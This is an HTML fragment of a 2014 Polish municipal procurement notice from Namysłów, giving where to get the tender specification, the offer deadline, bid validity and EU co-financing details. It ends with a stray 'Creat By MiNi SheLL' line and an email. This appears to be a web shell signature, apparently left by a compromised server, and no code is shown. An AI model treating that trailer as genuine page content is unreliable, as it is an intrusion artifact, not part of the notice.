<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.namyslow.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacja istotnych warunków zamówienia dostępna będzie w siedzibie Zamawiającego, budynek B, pok. nr 26 lub za zaliczeniem pocztowym. Siwz jest odpłatna (24,40 zł).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.03.2014 godzina 09:00, miejsce: oferty należy składać w siedzibie Zamawiającego - Urząd Miejski w Namysłowie, ul. Dubois 3, budynek A, w sekretariacie, pokój Nr 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Opolskiego na lata 2007-2013 inwestujemy w Twoją przyszłość.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com